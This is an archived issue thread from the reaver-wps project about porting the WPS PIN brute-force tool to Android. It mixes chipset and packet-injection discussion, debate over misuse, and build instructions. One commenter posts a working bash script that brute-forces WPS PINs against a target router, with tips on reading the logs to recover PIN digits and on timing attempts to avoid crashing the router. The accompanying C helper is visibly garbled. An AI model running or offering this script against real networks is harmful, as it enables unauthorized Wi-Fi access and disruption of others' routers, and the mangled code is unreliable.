Comments (47)
Can you get packet injection working on your android phone?
I guess that might/will be the biggest problem.
Unless you can inject packets I don't see it happening
Original comment by [email protected]
on 31 Dec 2011 at 2:29
from reaver-wps.
Some time ago i made working monitor mode and packet injection on g1 ( wifi
chipset wl1251 ) thx to n900 patches so at least on g1 / hero / magic ( all got
wl1251 ) it should be possible.
http://forum.xda-developers.com/showthread.php?t=1271854
Original comment by [email protected]
on 31 Dec 2011 at 4:53
from reaver-wps.
[deleted comment]
from reaver-wps.
Supply me an android phone that will do monitor+inject and I will make it
happen.
-peter
Original comment by [email protected]
on 1 Jan 2012 at 1:39
- Added labels: Priority-Low, Type-Enhancement
- Removed labels: Priority-Medium, Type-Defect
from reaver-wps.
[deleted comment]
from reaver-wps.
If an A855 Motorola Droid can do monitor+inject, I can produce a working
handset.
Original comment by [email protected]
on 3 Jan 2012 at 12:48
from reaver-wps.
Most Motorola phones use TI chipsets which are not capable.
Original comment by [email protected]
on 3 Jan 2012 at 2:58
from reaver-wps.
If i provid a micro linux embedded device that run an OpenWrt distro may be is
possible release a porting ?
Original comment by [email protected]
on 4 Jan 2012 at 1:22
from reaver-wps.
Original comment by [email protected]
on 11 Jan 2012 at 4:54
- Changed state: NeedMoreInfo
from reaver-wps.
Some devices support USB-OTG, which would enable a kernel module, like rtl8187,
for use with a USB wireless adapter.
Original comment by [email protected]
on 13 Jan 2012 at 7:04
from reaver-wps.
I think that this tool needs to stay on PC.Because today any kiddie with this
tool and Android smartphone can then hack their neighbors network and do all
kinds of trouble.And honestly we don't want increase of kid hackers.
Original comment by [email protected]
on 5 Feb 2012 at 1:42
from reaver-wps.
not just that but this tool boots clients off their routers.. we don't need
this in the hands of idiots =] or a windows version
what's wrong with a netbook like the eee? < 1 sec a pin on a cisco router.. I
wish there was a paypal to donate- I'd send a few bucks.. some really good code
here and he's integrating it into aircrack.. I see the site is selling a idiot
box to do this but if you have 600 bucks to throw around- then you are probably
proficient in other areas of life.. so have at it- I'm worried about the 12
year old snufalufagus with his phone denying his neighbors wifi by pressing a
button
it's like giving airpwn and a yagi to a moron and expecting him not to use it
on starbucks
between this and pyrit, it's no wonder I run wired at home with a long pass to
my ap.. even the brand new att routers are still vulnerable to the same attacks
as the last set, 100% breakable with the default key using wpa2.. who's in
charge of security over there, a cow maybe
Original comment by [email protected]
on 5 Feb 2012 at 4:38
from reaver-wps.
Considering that there is little consistency regarding android hardware this is
not the most likely port to occur, if it does then no doubt people will have to
buy the appropriate model (and revision) of phone (and a few sets of spare
batteries)
I'm sensing childishness though regarding the seeming anger regarding script
kiddies, do you really think that the script kiddies don't have laptops &
netbooks? If you where particularly knowledgeable you wouldn't be shouting
about keeping the tool PC only.
With Beagleboards, shivaplugs, Raspberry Pi and modded Pogoplugs there are a
multitude of low power consumption devices with USB (to use a network adaptor
of choice) to cause problems with (high powered antenna are not necessary with
such a setup) so don't be getting so precious folks, calm down
BTW there is real Wifi kit out there (I work with it) that live in retail
chains (and corporate land) strangely enough they do not use WPS, yes they have
been checked since christmas (to make sure they don't respond anyway), they are
much more interesting to play with than the average SoHo equipment
Original comment by [email protected]
on 6 Feb 2012 at 12:34
from reaver-wps.
[deleted comment]
from reaver-wps.
laptops and netbooks with windows running vmware and bt? yeah that's exactly
what they run.. but they've been limited to open and wep networks usually..
wpa2 solved with crunch piped to pyrit | cowpatty at 100k+/sec or dictionary
attack without a pre generated rainbow table is still out of skill set of the
snuffaluffagus.. they know nothing about these specific attacks or specialized
attacks on different types of routers, nothing because it takes more than
./configure make && make install..
reaver is so easy and automated, if it were to be ported to say ios for example
(jailbroke)- not just android (and it worked even with specific mass produced
phones), there would be jackass bowel movements all over the world.. I don't
care if a responsible geek manages to do this.. just the code he has written
here is almost too slick if you know what I'm sayin- he could have thrown in
some monkey wrenches =p I'm just sayin.. felt the same way about armitage..
anyways it's just my opinion on the matter.. what's sad is I noticed business
around here still running wep (even the bmw dealership's office runs wep here)
and at&t up to last year was still installing their 2wire routers with wep as
default
now they've switched to wpa2 but still have the same problem with the default
passkey, 10 characters numeric- that's 30 hours in pyrit for all the keys.. if
the wps pin attack didn't act like a dos on the router, I might not care- just
in the wrong hands this is a double butt violater
Original comment by [email protected]
on 6 Feb 2012 at 9:14
from reaver-wps.
I have to admit that for me an android version of reaver would be useful as the
people who hold the purse strings would get upset at a phone being used to
break their network security. For some reason 'management' still think that 'IT
professionals' are the only people on earth who have laptops (whatever an IT
professional is)
Anyway this will now be heading off topic
The biggest script kiddies I have ever encountered are so called professional
pen testers, they have their bought copy of Nessus on windows and a VM with
Backtrack then they simply follow their course notes, usually without much
understanding of the 'security issues' which they encounter.
However it has to be remembered that tomorrows talented 'security researchers'
are todays beginners and very few beginners start with original methods.
Without reaver (or the other python script) would you be playing with WPS
breaking ?
I can answer an honest NO (for myself), though 15-20 years ago the answer would
have been Yes, as my life permitted me time to write interesting things.
If your answer is 'no' then please don't complain about idiots who have the
same tools as you, it happens and they have as much right as you have.
I used to be really uptight about the undeserving cut & paste coders &
crackers, I'm older now.
re: There's poor security all over though sometimes there are reasons (mostly
arrogance, ignorance and cost) but sometimes its unavoidable legacy kit is
common, but the risk may be mitigated with careful firewalling, IDS and sanity
checking
Be thankful the tool exists in a reliable version and encourage it's spread to
other platforms, you may have need of it at some point
Original comment by [email protected]
on 7 Feb 2012 at 10:28
from reaver-wps.
motorola backflip here, is the same shit that my laptop, (broadcom stuff), as
far as i tried, just could enable monitor mode (buggy) and packets injection is
impossible, im pretty sure it can be done on another phone using a different
wlan chipset.
Original comment by [email protected]
on 25 Feb 2012 at 3:34
from reaver-wps.
Just wait for a recent kernel. Thanks to mac80211 nearly every recent driver in
the vanilla kernel supports package injection and monitor mode. Android phones
has just mostly very old kernel running.
Original comment by [email protected]
on 26 Feb 2012 at 4:17
from reaver-wps.
If tcpdump, wpa_cli and bash are available for android, which a quick bit of
recon tells me they are.
Then a workaround is more than likely possible. ;)
Original comment by [email protected]
on 28 Feb 2012 at 12:30
from reaver-wps.
For those who are alright with their programming, heres some basic building
blocks for a potential android wps tester. I'm just beginning programming, but
with a bit of help i rustled this up...this is the latest code i have working
thus far on a regular system that is....
Pre-requisites that would need to be working already on android are...
Bash
Tcp-dump,
Wpa-cli/wpa_supplicant
Tee
Ean8 (seperate module...i will include code as a suffix)
Heres the code i have working at the mo....The lines may get messed up, so I've
used me newly created #EL Tags to show where new lines are. Remove at own
discretion.
Name this file wpstester, or whatever you like ;), set its permissions, jobs a
good un. This is fairly system specific so you might need to tweak it here and
there to get it working properly.
#!/bin/bash #EL
sudo tcpdump -i wlan0 -v -l 2> /dev/null | tee /home/$USER/log.txt & #EL
sleep 7 #EL
for i in {0..1}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 15 #EL
done #EL
for i in {2..2000}; do #EL
code=$(printf "%04d"000 $i) #EL
ans=$(ean8 $code) #EL
echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
echo "WPS PIN : $ans" #EL
echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL
sleep 10 #EL
done #EL
sudo kill -9 2> /dev/null $(ps -A | grep tcpdump | awk '{print$1}') #EL
exit 0 #EL
And the Ean8 Module.....
#include <stdio.h> #include <stdlib.h> #include <string.h>
int main(int argc, char argv) {
int i, odd_sum = 0, even_sum = 0, sum, check_digit; // to install 'make ean8' or 'gcc -o ean8 ean8.c' char base; // then move exe to /bin path.
if (argc != 2) {
fprintf(stderr, "Error: Wrong number of arguments\n"); exit(EXIT_FAILURE);
}
base = argv1?;
if (strlen(base) != 7) {
fprintf(stderr, "Error: Argument is not 7 characters\n"); exit(EXIT_FAILURE);
}
for (i = 0; i < 7; i += 2) {
// Odd digits odd_sum += basei? - '0';
}
for (i = 1; i < 7; i += 2) {
// Even digits even_sum += basei? - '0';
}
sum = odd_sum 3 + even_sum; check_digit = (10 - (sum % 10)) % 10; printf("%s%d\n", base, check_digit);
return(EXIT_SUCCESS);
}
Theres some other little tweaks you may have to do as well, to a couple of the
other programs, I've posted what i did with those on the hints and tips part of
this forum.
Maybe this will help someone along the line come up with a workaround for
android...who knows.....If a reaver port isn't forthcoming.
Only downside is this workaround is a bit slower than reaver, until i figure
out how to implement small dh keys by tweaking the code in more than likely
wpa_supplicant/wpa_cli.
Good luck dudes/dudettes ;)
Original comment by [email protected]
on 6 Apr 2012 at 3:29
from reaver-wps.
P.s the third sleep command can be set as a variable to whatever you find the
minimum try time is before you fry/crash the router you are testing.
There is a trend i noticed whereby the first 1-2 tries take slightly longer
than the average send time, and if you put a longer sleep time for the first
1-2 attempts, then the following attempts can actually be sped up
significantly. Granted this isn't as fast as reavers small dh-keys, but for a
work-around i guess its o.k ;)
Original comment by [email protected]
on 6 Apr 2012 at 3:36
from reaver-wps.
Sorry triple post....Then you just have to grep the log files for 'id 4'. (Off
the top of my head, might be 'id 3' though =P) That result cross-correlates
with the time in the other log-file and there you have the first 4 digits of
the wps pin.
Original comment by [email protected]
on 6 Apr 2012 at 3:40
from reaver-wps.
Haha sorry last thing.
In the original post on the hints and tips part i mentioned using wireshark.
You can use this method if you want, but the newer post above, creates a
semi-automatic solution, (i.e its better). By using the generically available
tcpdump instead, and integrating it as a co-process in the source-code.
Perhaps someone else can then take this and fully-automate it, the next step
was to integrate a sectional grepping procedure...i.e test 1..100 pins then
stop grep...check for 'id 3 (or 4)'continue...
I suppose i can continue my quest though, its actually a fascinating project
for learning a little programming =P.
Original comment by [email protected]
on 6 Apr 2012 at 4:00
from reaver-wps.
Any progress with reaver working with android?
Original comment by [email protected]
on 15 May 2012 at 9:11
from reaver-wps.
Yes. Put backtrack 5 on android!
Original comment by [email protected]
on 18 Jun 2012 at 3:53
from reaver-wps.
N900 and N950 has reaver.
Original comment by [email protected]
on 11 Aug 2012 at 9:40
from reaver-wps.
[deleted comment]
from reaver-wps.
[deleted comment]
from reaver-wps.
Monitor mod in android un possible. http://bcmon.blogspot.fi/. now only what we
need is reaver :)
Original comment by [email protected]
on 23 Sep 2012 at 1:56
from reaver-wps.
OMG, so much thanks for that link !!!!1 ;DDDD
Original comment by [email protected]
on 23 Sep 2012 at 3:12
from reaver-wps.
Anyway Reaver needs root, that's why it wouldn't be program for children :-)
Original comment by NosovK
on 29 Sep 2012 at 11:16
from reaver-wps.
Is there any way to boot it in Symbian OS?
Original comment by [email protected]
on 29 Jan 2013 at 12:20
from reaver-wps.
Any updates? I'd love to get reaver on my phone.
Original comment by [email protected]
on 2 Mar 2013 at 11:18
from reaver-wps.
hey there android supports now rtl 8187 chipset in monitor mode via USB-OTG no
root required
http://www.kismetwireless.net/android-pcap/
might be that injection would work too... so anyone out there ready to make
reaver-android port??
Original comment by [email protected]
on 4 Mar 2013 at 10:56
from reaver-wps.
HD2 with Android and Backtrack installed.
I have compiled and installed bcm4329 driver with monitor mode that works
correctly with airomon and aireplay.
Also, I have compiled and installed Reaver, but there is support problem.
Reaver will not associate (timeout occur).
After aireplay fakeauth Reaver associate but start getting
WARNING: Receive timeout occurred
Recorder PCAP file with both Reaver association attempt and after areplay
association:
https://www.dropbox.com/s/bjsq8q2hfuyv7tc/rr-02.cap
Original comment by [email protected]
on 23 Jun 2013 at 8:34
from reaver-wps.
Just checked from other computer that monitored same AP activity. There is no
any packet actually sent from HD2 via Reaver.
Only when I used areplay packet was really sent.
rr-02.cap shows packet cap from same device as Reaver.
Driver Developer mentioned following:
"Radiotap - we don't handle radiotap on packet injection. 'aireplay-ng' works
fine with it but tools like 'reaver' seem to require it."
Can you make a support for packet injection without Radiotap ? (Like on
aireplay)
Original comment by [email protected]
on 23 Jun 2013 at 11:28
from reaver-wps.
People new update on monitor mode on Android:
http://bcmon.blogspot.de/2013/07/monitor-mode-reloaded_14.html
As far as i know that was one of the big problem to not having Reaver ported to
Android.
#35
How did you compile and install Reaver on Android? I'm on a Nexus 7 with
CyanogenMod 10.1.2. Thanks in advance.
Original comment by [email protected]
on 23 Jul 2013 at 11:29
from reaver-wps.
Done.
http://forum.xda-developers.com/showthread.php?t=2456888
Original comment by [email protected]
on 24 Sep 2013 at 7:49
from reaver-wps.
BCMON.apk does not work correctly with HD2 (ICS myMIUI ROM).
ping_bcmon does not returns packets.
I have tested supplied reaver with older (2012) bcmon kernel module drivers,
reaver starts fine but will not inject packets. Function pcap_inject is
processed without exception but packet do not leave interface.
Original comment by [email protected]
on 26 Sep 2013 at 8:40
from reaver-wps.
I feel like no one read anything that was being written on this blog
previously. Did no one notice that it's a good thing to not have tons of people
have this on their iPhones? Keep it to yourself. Don't post android ROMs with
reaver already installed online. Just do it by yourself. Do not jeopardize
Internet security for temporary happiness. That's terrorism. I feel like there
are only a few software engineers who would like to be terrorists.
Original comment by [email protected]
on 27 Oct 2013 at 12:10
from reaver-wps.
Ok calm down francis
Original comment by [email protected]
on 27 Oct 2013 at 12:26
from reaver-wps.
Jeopardizing Internet security? Sheesh.
If Reaver works on it, it was already insecure long before it became easy...
Original comment by [email protected]
on 27 Oct 2013 at 3:43
from reaver-wps.
Hello every one , does any one can help to install reaver it gives me error
pleaseeeeeeeeee:
./configure
checking for gcc... gcc
checking whether the C compiler works... no
configure: error: in `/root/reaver-1.4/src':
configure: error: C compiler cannot create executables
See `config.log' for more details.
Original comment by [email protected]
on 30 Oct 2014 at 11:30
from reaver-wps.
i installed bcmon and reaver for android but when i opened RfA and test the
monitor mode it showed me an error that monitor mode activation failed what to
do now
Original comment by [email protected]
on 12 Feb 2015 at 4:40
from reaver-wps.
[deleted comment]
from reaver-wps.
[deleted comment]
from reaver-wps.
Porting reaver-wps for android ARM platform
Steps:
1 - install crosscompiler ARM GNUEABI ( sudo apt-get install
gcc-4.7-arm-linux-gnueabi g++-4.7-arm-linux-gnueabi)
2 - Download http://www.infradead.org/~tgr/libnl/files/libnl-3.2.25.tar.gz
3 - Download http://www.tcpdump.org/release/libpcap-1.7.4.tar.gz
4 - Download Reaver-WPS source
5 - extract libnl-3.2.25.tar.gz and libpcap-1.7.4.tar.gz
6 - execute configure script for build Makefile LIBNL3(./configure
--prefix=/system --host=arm-linux-gnueabi LDFLAGS='-static -L/system/lib' &&
make && sudo make install
7 - execute configure script for build Makefile LIBPCAP(./configure
--prefix=/system --host=arm-linux-gnueabi --with-pcap=linux
CFLAGS='-I/system/include/libnl3' LDFLAGS='-static -L/system/lib' && make &&
sudo make install
8 - download https://www.sqlite.org/2015/sqlite-autoconf-3081101.tar.gz SQLITE3
( /configure --prefix=/system --host=arm-linux-gnueabi
CFLAGS='-L/system/include' LDFLAGS='-static -L/system/lib' && make && sudo make
install)
9 Configuring for compiler ARM Reaver-WPS ./configure --prefix=/system
--sysconf=/etc && make V=1 CC=arm-linux-gnueabi-gcc CFLAGS='-pthread -s -static'
10 copy files wash and reaver static compiled to /system/xbin in rooted device
(my rooted CM12 device is XT1069 using Dongle USB OTG TL-WR721N TPKINK firmware
kernel ath9k_htc modules ARM)
compiled binary files static
https://mega.co.nz/#!ZcN0EZoZ!DSSGCI4VV1O9eNd-fzmcr0Hu-t5XWxHfU9RJcaSn8D4
https://mega.co.nz/#!wd1EFZia!bROKZ4TFKx24w7niTMcZCU1YGw3D-QpwWUl5AZhW4uY
Reaver-WPS GUI APK
http://forum.xda-developers.com/showthread.php?t=2456888
have Fun :)
Original comment by [email protected]
on 1 Aug 2015 at 3:26
from reaver-wps.
Related Issues (20)
- is my interface blocked? "Warning: received timeout occurred" HOT 2
- AP Rate Limiting - Reaver HOT 2
- Enter one-line summary HOT 2
- Reaver strange problem
- Reaver won't associate or eapol error
- Reaver doesn't work. HOT 1
- latest reaver 1.4-2 confirmed bug HOT 1
- WPS transaction failed (code: 0x02) Please Help! HOT 1
- any advice? HOT 2
- reaver vodafone station revolution
- reaver starts at 90% with any pin HOT 1
- Integration with Cloudcracker
- "make" issues. ubuntu 15.04 amd 64 with (apt-get dist-upgrade) HOT 1
- how to get wps pin if you know the password of wifi?? HOT 1
- My computer doesn't have the program needed to open the downloaded file???
- My computer doesn't have the program needed to open the downloaded file??? HOT 1
- PROBLEME WITH REAVER/BROADCOM4313
- wps pin not found
- Resend M-Messages if AP did not receive last one
- apt-get install libpcap-dev [Not installing the packages]
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from reaver-wps.